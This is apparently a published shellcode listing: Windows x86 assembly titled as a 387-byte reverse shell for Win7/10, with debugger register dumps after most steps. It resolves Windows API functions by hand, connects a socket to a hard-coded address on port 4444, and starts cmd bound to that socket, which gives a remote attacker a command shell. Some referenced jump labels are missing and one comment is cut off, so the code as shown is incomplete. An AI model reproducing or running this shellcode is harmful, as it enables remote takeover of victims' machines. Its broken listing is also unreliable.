; Exploit Title:Windows x86 - spawn reverse shell Win7/10 (387 bytes)
; Date: 2019-11-16
; Author: bolonobolo
; Vendor Homepage: None
; Software Link: None
; Tested on: Windows x86
; Comments: reverse shell
; CVE: N/A
global _start
section .text
xor ecx, ecx ; zeroing register ECX
mul ecx ; zeroing register EAX EDX
mov eax, [fs:ecx + 0x030] ; PEB loaded in eax
mov eax, [eax + 0x00c] ; LDR loaded in eax
mov esi, [eax + 0x014] ; InMemoryOrderModuleList loaded in esi
lodsd ; program.exe address loaded in eax (1st module)
xchg esi, eax
lodsd ; ntdll.dll address loaded (2nd module)
mov ebx, [eax + 0x10] ; kernel32.dll address loaded in ebx (3rd module)
; EBX = base of kernel32.dll address
mov edx, [ebx + 0x3c] ; load e_lfanew address in ebx
add edx, ebx
mov edx, [edx + 0x78] ; load data directory
add edx, ebx
mov esi, [edx + 0x20] ; load "address of name"
add esi, ebx
xor ecx, ecx
; ESI = RVAs
inc ecx ; ordinals increment
lodsd ; get "address of name" in eax
add eax, ebx
cmp dword [eax], 0x50746547 ; GetP
jnz getProcAddress
cmp dword [eax + 0x4], 0x41636F72 ; rocA
jnz getProcAddress
cmp dword [eax + 0x8], 0x65726464 ; ddre
jnz getProcAddress
mov esi, [edx + 0x24] ; offset ordinals
add esi, ebx ; pointer to the name ordinals table
mov cx, [esi + ecx * 2] ; CX = Number of function
dec ecx
mov esi, [edx + 0x1c] ; ESI = Offset address table
add esi, ebx ; we placed at the begin of AddressOfFunctions array
mov edx, [esi + ecx * 4] ; EDX = Pointer(offset)
add edx, ebx ; EDX = getProcAddress
mov ebp, edx ; save getProcAddress in EBP for future purpose
xor ecx, ecx ; zeroing ecx
push ecx ; push 0 on stack
push 0x41797261 ;
push 0x7262694c ; AyrarbiLdaoL
push 0x64616f4c ;
push esp
push ebx ; kernel32.dll
call edx ; call GetProcAddress and find LoadLibraryA address
; EAX 76392864 kernel32.LoadLibraryA
; ECX 76340000 kernel32.76340000
; EDX 76340000 kernel32.76340000
; EBX 76340000 kernel32.76340000
; ESP 0022FF7C ASCII "LoadLibraryA"
; EBP 76391837 kernel32.GetProcAddress
; ESI 763F4DD0 kernel32.763F4DD0
; EDI 00000000
; EIP 0040106F reverse_.0040106F
push 0x61613233 ; 23
sub word [esp + 0x2], 0x6161 ; sub aa from aa23_2sw
push 0x5f327377 ; _2sw
push esp ; pointer to the string
call eax ; call Loadlibrary and find ws2_32.dll
mov esi, eax ; save winsock handle for future puproses
; EAX 76740000 OFFSET ws2_32.#332
; ECX 77DC316F ntdll.77DC316F
; EDX 005E0174
; EBX 76660000 kernel32.76660000
; ESP 0022FF74 ASCII "ws2_32"
; EBP 766B1837 kernel32.GetProcAddress
; ESI 76740000 OFFSET ws2_32.#332
; EDI 00000000
; EIP 00401085 reverse_.00401085
push 0x61617075 ; aapu
sub word [esp + 0x2], 0x6161 ; sub aa from aapu
push 0x74726174 ; trat
push 0x53415357 ; SASW
push esp ; pointer to the string
push esi ; winsock handler
call ebp ; GetProcAddress(ws2_32.dll, WSAStartup)
; EAX 7674C0FB ws2_32.WSAStartup
; ECX 76740000 OFFSET ws2_32.#332
; EDX 00001725
; EBX 76660000 kernel32.76660000
; ESP 0022FF68 ASCII "WSAStartup"
; EBP 766B1837 kernel32.GetProcAddress
; ESI 76740000 OFFSET ws2_32.#332
; EDI 00000000
; EIP 0040109F reverse_.0040109F
xor edx, edx
mov dx, 0x190 ; EAX = sizeof( struct WSAData )
sub esp, edx ; alloc some space for the WSAData structure
push esp ; push a pointer to this stuct
push edx ; push the wVersionRequested parameter
call eax ; call WSAStartup(MAKEWORD(2, 2), wsadata_pointer)
; EAX 00000000
; ECX 7674C230 ws2_32.7674C230
; EDX 77DB0002 ASCII "ingToUnicodeString"
; EBX 76660000 kernel32.76660000
; ESP 0022FDD8
; EBP 766B1837 kernel32.GetProcAddress
; ESI 76740000 OFFSET ws2_32.#332
; EDI 00000000
; EIP 004010AA reverse_.004010AA
push 0x61614174 ; 'aaAt'
sub word [esp + 0x2], 0x6161 ; sub aa from aaAt
push 0x656b636f ; 'ekco'
push 0x53415357 ; 'SASW'
push esp ; pointer to the string
push esi ; socket handler
call ebp ; GetProcAddress(ws2_32.dll, WSASocketA)
; EAX 7674B7FC ws2_32.WSASocketA
; ECX 76740000 OFFSET ws2_32.#332
; EDX 00001725
; EBX 76660000 kernel32.76660000
; EBP 766B1837 kernel32.GetProcAddress
; ESI 76740000 OFFSET ws2_32.#332
; EDI 00000000
; EIP 004010C4 reverse_.004010C4
xor edx, edx ; clear edx
push edx; ; dwFlags=NULL
push edx; ; g=NULL
push edx; ; lpProtocolInfo=NULL
mov dl, 0x6 ; protocol=6
push edx
sub dl, 0x5 ; edx==1
push edx ; type=1
inc edx ; af=2
push edx
call eax ; call WSASocketA
push eax ; save eax in edx
pop edi ;
; EAX 00000054
; ECX 73FB685E
; EDX 00000016
; EBX 76660000 kernel32.76660000
; EBP 766B1837 kernel32.GetProcAddress
; ESI 76740000 OFFSET ws2_32.#332
; EDI 00000054
; EIP 004010D6 reverse_.004010D6
push 0x61746365 ; atce
sub word [esp + 0x3], 0x61 ; atce - a = tce
push 0x6e6e6f63 ; nnoc
push esp ; pointer to the string
push esi ; socket handler
call ebp ; GetProcAddress(ws2_32.dll, connect)
; EAX 767448BE ws2_32.connect
; ECX 76740000 OFFSET ws2_32.#332
; EDX 00001725
; EBX 76660000 kernel32.76660000
; ESP 0022FDC4 ASCII "connect"
; EBP 766B1837 kernel32.GetProcAddress
; ESI 76740000 OFFSET ws2_32.#332
; EDI 00000054
; EIP 004010EA reverse_.004010EA
;set up sockaddr_in
mov edx, 0xec02a9c1 ;the IP plus 0x01010101 so we avoid NULLs (IP=
sub edx, 0x01010101 ;subtract from edx to obtain the real IP
push edx ;push sin_addr
push word 0x5c11 ;0x115c = (port 4444)
xor edx, edx
mov dl, 2
push dx
mov edx, esp
push byte 0x10
push edx
push edi
call eax
; EAX 00000000
; ECX 00347010
; EDX 77DB64F4 ntdll.KiFastSystemCallRet
; EBX 76660000 kernel32.76660000
; ESP 0022FDBC
; EBP 766B1837 kernel32.GetProcAddress
; ESI 76740000 OFFSET ws2_32.#332
; EDI 00000054
; EIP 00401108 reverse_.00401108
xor ecx, ecx ; zeroing ECX
push 0x61614173 ; aaAs
sub word [esp + 0x2], 0x6161 ; aaAs - aa
push 0x7365636f ; ecor
push 0x72506574 ; rPet
push 0x61657243 ; aerC
push esp ; push the pointer to stack
push ebx ; kernel32 handler
call ebp ; GetProcAddress(kernel32.dll, CreateProcessA)
mov esi, ebx ; save kernel32.dll handler for future purposes
; EAX 76662062 kernel32.CreateProcessA
; ECX 76660000 kernel32.76660000
; EDX 76660000 kernel32.76660000
; EBX 76660000 kernel32.76660000
; ESP 0022FDAC ASCII "CreateProcessA"
; EBP 766B1837 kernel32.GetProcAddress
; ESI 76660000 kernel32.76660000
; EDI 00000054
; EIP 00401129 reverse_.00401129
push 0x61646d63 ; push admc
sub word [esp + 0x3], 0x61 ; sub a to admc = dmc
mov ebx, esp ; save a pointer to the command line
push edi ; our socket becomes the shells hStdError
push edi ; our socket becomes the shells hStdOutput
push edi ; our socket becomes the shells hStdInput
xor edi, edi ; Clear edi for all the NULL's we need to push
push byte 0x12 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop ecx ; Set ECX for the loop
push edi ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
mov word [esp + 0x3C], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
mov byte [esp + 0x10], 0x44
lea ecx, [esp + 0x10] ; Set EAX as a pointer to our STARTUPINFO Structure
;perform the call to CreateProcessA
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
push ecx ; Push the pointer to the STARTUPINFO Structure
push edi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
push edi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
push edi ; We dont specify any dwCreationFlags
inc edi ; Increment edi to be one
push edi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
dec edi ; Decrement edi back down to zero
push edi ; Set lpThreadAttributes to NULL
push edi ; Set lpProcessAttributes to NULL
push ebx ; Set the lpCommandLine to point to "cmd",0
push edi ; Set lpApplicationName to NULL as we are using the command line param instead
call eax
; EAX 00000001
; ECX 766BF6B0 kernel32.766BF6B0
; EDX 002E0174
; EBX 0022FDA8 ASCII "cmd"
; ESP 0022FD54
; EBP 766B1837 kernel32.GetProcAddress
; ESI 76660000 kernel32.76660000
; EDI 00000054
; EIP 0040115F reverse_.0040115F
add esp, 0x010 ; clean the stack
push 0x61737365 ; asse
sub word [esp + 0x3], 0x61 ; asse -a
push 0x636F7250 ; corP
push 0x74697845 ; tixE
push esp
push esi
call ebp ; GetProcAddress(kernel32.dll, ExitProcess)
xor ecx, ecx
push ecx
call eax